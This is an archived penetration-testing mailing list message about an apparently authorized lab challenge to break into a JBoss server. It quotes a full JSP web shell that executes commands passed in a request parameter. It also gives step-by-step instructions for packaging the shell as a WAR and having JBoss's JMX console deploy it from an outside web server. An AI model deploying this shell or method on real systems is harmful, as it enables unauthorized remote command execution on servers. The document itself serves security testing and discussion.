Penetration Testing mailing list archives
Re: breaking jboss with a browser? not happening
From: lazers <a.alii85 () gmail com>
Date: Fri, 21 Jan 2011 00:08:23 -0800 (PST)
No i don't want to attack web-vulnerabilities as sql-injection and xss. However, what little i know about nessus that in the scan profile section under the general tab you can select settings which would could support web-application environment. But my main target was not to exploit the server through web-application vulnerability but just to scan the server; for server side weakness and flaws. This particular flaw is id by nessus plugin as 23842 JBoss JMX Console Unrestricted Access. The only way Nessus would have know about this vulnerability by perhaps accessing the default page/port address of the server. Thats it. I don't think it an application rlevel vulnerability but the server side coz its not the application that allows the default page setting to be set on default but the server itself that has been set-up in a insecure mode. The only way you can fix but not applying some kind of patch at the application level as that would be a work-around the only way to truly fix this the only way to prevent this would be too add proper authentication. Please comment and let me know what im saying is right. psiinon wrote:
Hi Lazers, Is it the jboss server or an application running on the jboss server you need to break? Nessus is a server scanner rather than a web application scanner, so its good for identifying vulnerabilities in jboss but not in web applications running in jboss. If you need to attack web applications then you should use a web application scanner. There are many automated web app scanners, but personally I think its best to use a tool that allows you to perform manual attacks as well. There are excellent tools like the burp suite and webscarab, but not surprisingly I'd also recommend my tool: the OWASP Zed Attack Proxy: http://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project :) Good luck with your challenge, Psiinon On Fri, Jan 14, 2011 at 8:02 PM, lazers <a.alii85 () gmail com> wrote:I have been given task to break into jboss application by my senior sec manager at my company. Its a hacking challenge staged in a test lab This is what i have been given. A web-access to jboss. Yes that pretty much it<3. He believes in less is more philosophy. With some get to start working info. I have been told that a vulnerability exists inthe application and its no 0 day exploit its an known vulnerability.It is set as an open-book challenge i can get help anywhere i like. So what i did so for? Yes i google ; but i also run a nessus scan and the scan brought me one HIGH vulnerability. Its has to do with the default Jboss installation using the JMX-Console. Its not a new vulnerability i was able to reach this conclusion as i start googling. This particular vulnerability is very popular; I was saying to myself that my problems are over and i would be break it into jboss in record time. But that has been largely un-true. Why? Well if it wasn't true i wouldn't be here. I did the following (in steps) attack vector: deployment scanner feature 1.confirmed the default installation (by accessing localhost:9090) in my case its 9090 not 8080 as in hacking literature. Probably this is because em using a new version (idk exact reason) 2.i wrote this jsp script(cmd.jsp) astold in sites. <%@ page import="java.util.*,java.io.*"%> <% %> <HTML><BODY> Commands with JSP <FORM METHOD="GET" NAME="myform"ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") +"<BR>"); Process p =Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> </BODY></HTML> 3.next i create a web.xml file to be placed in WEB-INF folder <?xml version="1.0" ?> <web-app xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd" version="2.4"> <servlet> <servlet-name>Command</servlet-name> <jsp-file>/cmd.jsp</jsp-file> </servlet> </web-app> 4.I complied the file cmd.jsp by placing the web.xml file in WEB-INF folder jar cvf cmd.war WEB-INF cmd.jsp 5. I put this file in http-apache server. File cmd.war reside at htdocs folder. Can be accessed by url: mywebserver:80/cmd.war 6.i go back to jboss defualt page and navigate myself to jboss.deploymentpage. 7. in the addurl tab i enter path for my cmd.war file as http://mywebserver/cmd.war 8. next i goto victim webserver in attempt to access my uploaded application http://victim:9090/cmd/cmd.jsp 9. i get HTTP STATUS 404- /cmd/cmd.jsp my app is suppose to be hot deployed by the jboss; but this is not the case coz even after 10-20 times after u have access the file i get the same error page. I want to know what is the reason for the behavior. I know there exists other attack vector (e.g rmi and etc) but i want to stick to this until i don't figure out the reason for this failure of exploit. Em i compiling the .jsp file with incorrect syntax? do i need to have tomcat server installed instead? I read it on internet that there could be some problems in the jboss trying to get reverse shell on your web-server as jboss is it work in bind-shell mode only? I'm really clueless to what i happening i spent 12 works on this single attack vector but em not making head-ways. jboss gurus help me. thanks -- View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30674976.html Sent from the Penetration Testing mailing list archive at Nabble.com. ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
-- View this message in context: http://old.nabble.com/breaking-jboss-with-a-browser--not-happening-tp30674976p30726520.html Sent from the Penetration Testing mailing list archive at Nabble.com. ------------------------------------------------------------------------ This list is sponsored by: Information Assurance Certification Review Board Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT and CEPT certs require a full practical examination in order to become certified. http://www.iacertification.org ------------------------------------------------------------------------
Current thread:
- breaking jboss with a browser? not happening lazers (Jan 18)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)
- Re: breaking jboss with a browser? not happening spdr (Jan 20)
- Re: breaking jboss with a browser? not happening danuxx (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening psiinon (Jan 20)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- RE: breaking jboss with a browser? not happening Hembrow, Chris (Jan 20)
- Re: breaking jboss with a browser? not happening YGN Ethical Hacker Group (Jan 23)
- Re: breaking jboss with a browser? not happening Matt Gardenghi (Jan 23)
- RE: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening lazers (Jan 23)
- Re: breaking jboss with a browser? not happening Robin Wood (Jan 18)